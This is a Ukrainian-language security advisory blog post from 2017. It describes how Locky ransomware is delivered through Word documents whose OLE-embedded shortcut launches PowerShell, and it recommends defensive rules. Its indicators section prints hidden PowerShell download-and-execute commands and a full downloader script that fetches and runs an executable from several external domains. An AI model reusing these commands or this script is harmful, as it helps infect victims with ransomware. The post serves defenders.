Archive | 02/11/2017

OLE(ps) замість DDE

загадка:

не DDE, не макрос, а powershell викликає..

Доставку Locky почали здійснювати за допомогою OLE, де в якості об’єкту – ярлик на Powershell.

Важливий момент – в цьому випадку оновлення MS, деактивація DDE від таких файлів не захищає, бо це старе OLE. Інший механізм.

У кого було блокування створення .exe в профілі або хоча би %temp% – захищені

У кого були обидва правила на дочірні процеси – і на CMD і на Powershellзахищені

Усім іншим поки що повезло, бо проміжний downloader не завантажував основну частину на системи українського сегменту. Поки що.

В котре наголошую, що на фоні масових розсилок, які поки що не шкодять, в окремих цільових атаках можуть застосовуватися схожі, але вже локалізовані документи – із різними типами начинки як DDE, так і OLE, macros.

Схема атаки:

email > .doc (OLE - LNK - PS) > запитання1? > powershell > GET URL list > GET payload1 > %temp%\*1.exe > GET encoded payload2 > %temp%\*2.exe

* Із схеми викинули проміжне звернення до CMD, команди на завантаження переліку адрес іде напряму з winword на powershell

Принцип дії простий – при відкритті документу жертва бачить прохання клікнути двічі на зображенні

(зображення може бути інакшим – не прив’язуйтеся саме до цієї картинки!)

Подвійний клік спричиняє активацію OLE який видобуває в %tmp% ярлик на виклик powershell із зашитим рядком URL.

Далі усе як раніше. Тільки цього разу без проміжного звернення до cmd.

Контрзаходи:

1) Переконайтеся, що застосували правила для cmd і powershell

2) Блокування доступу до Internet для Powershell (варіант #1)

3) Блокування створення .exe в %temp%

Приклад спрацювання правила на запуск дочірніх процесів:

Маркери компрометації:

Файли з двох різних кампаній.

Invoice INV0000252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring([System.Uri]'h11p:\cornertape.net/eiuhf384'))

443051465

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring([System.Uri]'h11p:\hispanic-models.com/kjsdch7346'))

За посиланням  – некодований набір інструкцій (їм стало ліньки робити обфускації у проганяти через base64)

Зверніть увагу – запис проміжного payload (downloader) у каталог %temp%

$us = "h11p:\ingress.kannste.net/JHGbdc34","h11p:\givagarden.com/JHGbdc34","h11p:\hotelruota.it/JHGbdc34","h11p:\internet-webshops.de/JHGbdc34","h11p:\hilaryandsavio.com/JHGbdc34","h11p:\cirad.or.id/JHGbdc34"
foreach($u in $us){
Try{
Write-Host $u
$f = "$env:temp\h8.exe"
Write-Host $f
$w = New-Object System.Net.WebClient
$w.DownloadFile($u, $f)
Start-Process $f
break
}Catch{}}

Будьте уважні та обережні!

VR
Advertisements